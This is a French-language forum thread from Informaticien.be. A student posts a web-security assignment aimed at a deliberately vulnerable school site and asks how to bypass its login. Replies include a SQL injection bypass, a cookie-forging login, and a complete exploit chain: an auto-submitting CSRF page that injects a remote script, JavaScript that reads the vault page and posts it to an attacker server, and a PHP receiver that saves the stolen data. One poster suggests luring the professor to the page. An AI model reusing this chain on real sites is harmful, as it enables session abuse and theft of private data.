Se connecter  
Suivez Informaticien.be sur Facebook  Suivez Informaticien.be sur Twitter  Suivez le Podcast Les Technos sur YouTube  Suivez le Podcast Les Technos sur iTunes  Suivez Informaticien.be via RSS
    Poster une réponse à un sujet: Sécurité
    Attention, ce sujet est un sujet ancien (3972 jours sans réponse)
    zoubi
    crazy
    petrus
    clindoeil
    bisous
    bombe
    bogoss
    boggled
    bave
    aidantai
    smile
    tongue
    oh
    angry
    grin
    disapointted
    shy
    cry
    wam
    sol
    wink
    sad
    kiki
    banzai
    joce
    boidleau
    chut
    ddr555
    dawa
    eek
    heink
    huit
    halalala
    lol
    kaola
    mmmfff
    liplick
    na
    whistle
    love
    roll
    ohwell
    tinostar
    topicalacon
    sweat
    forum_emoticons.html
    Gras [b]Texte[/b] Italique [i]Italique[/i] Souligné [u]Souligné[/u] Barré [strike]Barré[/strike]
    Courriel [email=nobody@nobody.org]Nom[/email] Lien [url=http://www.website.com]Texte[/url] Ancre [anchor]Nom[/anchor] Image [img]http://www.website.com/image.jpg[/img] Insérer une image en provenance du site
    Aligné à gauche [align=left]Texte[/align] Centré [align=center]Texte[/align] Aligné à droite [align=right]Texte[/align] Toute la largeur [align=justify]Texte[/text]
    Couleur [color=#000000]Text[/color] Mise en forme [highlight=pascal]Texte[/highlight] Widgets Emoticons :code: [:code] Convertisseur HTML vers BBCode Convertisseur Word vers BBCode
    Prévisualisation Vérification de l'orthographe

    Copier Coller Couper Tout sélectionner
    Tout effacer Insérer la date Insérer l'heure Insérer la date et heure Insérer votre IP
    Liste [list=square][item]BlaBla[/item][/list] Liste Numérotée [list=decimal][item]BlaBla[/item][/list]
    Citation [quote=name]Texte[/quote] Spoiler [spoiler]James est le meurtrier![/spoiler]
    Tout en majuscules [uppercase]Texte[/uppercase] Tout en minuscules [lowercase]Texte[/lowercase] l33t [l33t]Je suis un nerd[/l33t] Texte en indice [sub]Texte[/sub] Texte en exposant [sup]Texte[/sup] Taille du texte [size=8]Texte[/size]
     
    eric
    tu as fait la sécurité aussi à l'ESI
    Tang
    Citation de: rfr
    ...
    Mais comme toi non plus et que la solution à l'exercice est ici, tu auras zéro et puis c'est tout.

    Maintenant il faudra expliquer à ton prof pourquoi tu as essayé de tricher et que maintenant, son exercice est tout pourri parce que la solution est sur le net. C'est malin hein ...


    :lol: :lol: :lol:
    Dr_Dan
    :rofl:
    rfr
    Suffit de définir les cookies "à la main" dans firefox par ex:
    connected=true
    email=f@f.com
    password=nimporte

    et d'aller sur la bonne url.

    Pour la phase2:

    bust.html

    <html>
    <head>
    <title>bust</title>
    </head>
    <body onload="init();">
    <script type="text/javascript">
    function init() {
    document.getElementById("form").submit();
    }
    </script>

    <form id="form" action="http://esidcf.alwaysdata.net/search.php" method="post">

    <input type="hidden" name="personName" value='</div><script type="text/javascript" src="http://server/test.js"></script><div>'/>
    <input type="submit" />
    </form>
    </body>
    </html>


    test.js

    function httpGet(theUrl)
    {
    var xmlHttp = null;

    xmlHttp = new XMLHttpRequest();
    xmlHttp.open( "GET", theUrl, false );
    xmlHttp.send( null );
    return xmlHttp.responseText;
    }

    function httpPost(theUrl,data)
    {
    var xmlHttp = null;

    xmlHttp = new XMLHttpRequest();
    xmlHttp.open( "POST", theUrl, false );
    xmlHttp.send( data );
    }

    var result = httpGet("http://esidcf.alwaysdata.net/coffre.php");

    httpPost("http://server/damnedpost.php", result);


    damnedpost.php

    <?php
    file_put_contents('/tmp/xxtest.txt', file_get_contents('php://input'));
    ?>


    Suffit de rediriger le prof vers l'url http://server/bust.html

    Il y a un exception dans le httpPost de test.js mais comme ça fonctionne quand même, je n'ai pas cherché.

    Mais comme toi non plus et que la solution à l'exercice est ici, tu auras zéro et puis c'est tout.

    Maintenant il faudra expliquer à ton prof pourquoi tu as essayé de tricher et que maintenant, son exercice est tout pourri parce que la solution est sur le net. C'est malin hein ...
    zion
    :ddr555:
    rfr
    Et comment s'appelle le professeur? :tongue:
    eric
    Bonjour,

    Quelqu'un sait comment est il possible de se connecter sans avoir de mot de passe, et ce,
    grâce à 2 failles différentes.

    On vous demande d’analyser les failles du site web de référence http://
    esidcf.alwaysdata.net, spécialement développé pour le projet. Ce site comporte au
    minimum 1 faille par type de faille étudié au cours (XSS, CSRF, Injection SQL et Cross
    Site Cooking). Grâce à ces failles, vous devriez être capable de récupérer les sources du
    site web afin de me les rendre corrigées.

    Phase 1

    Connectez-vous au site en utilisant les informations suivantes: f@f.com / aaaaaa. Ce site
    comporte 4 pages: une page de connexion, une page présentant un solde bancaire en
    euros, une page présentant le contenu d’un coffre fort et une page permettant de
    rechercher une personne dans le site.

    Expliquez comment il est possible de se connecter sans avoir de mot de passe, et ce,
    grâce à 2 failles différentes.

    1) avec SQL INJECTION il faut :

    Pseudo= ' OR 1=1#
    password=' OR 1=1#


    2) J'ai pas d'idée
    Catégorie:  






    Ada
    CSS
    Cobol
    CPP
    HTML
    Fortran
    Java
    JavaScript
    Pascal
    Perl
    PHP
    Python
    SQL
    VB
    XML
    Anon URL
    DailyMotion
    eBay
    Flickr
    FLV
    Google Video
    Google Maps
    Metacafe
    MP3
    SeeqPod
    Veoh
    Yahoo Video
    YouTube
    6px
    8px
    10px
    12px
    14px
    16px
    18px
    Informaticien.be - © 2002-2026 AkretioSPRL  - Generated via Kelare
    The Akretio Network: Akretio - Freedelity - KelCommerce - Votre publicité sur informaticien.be ?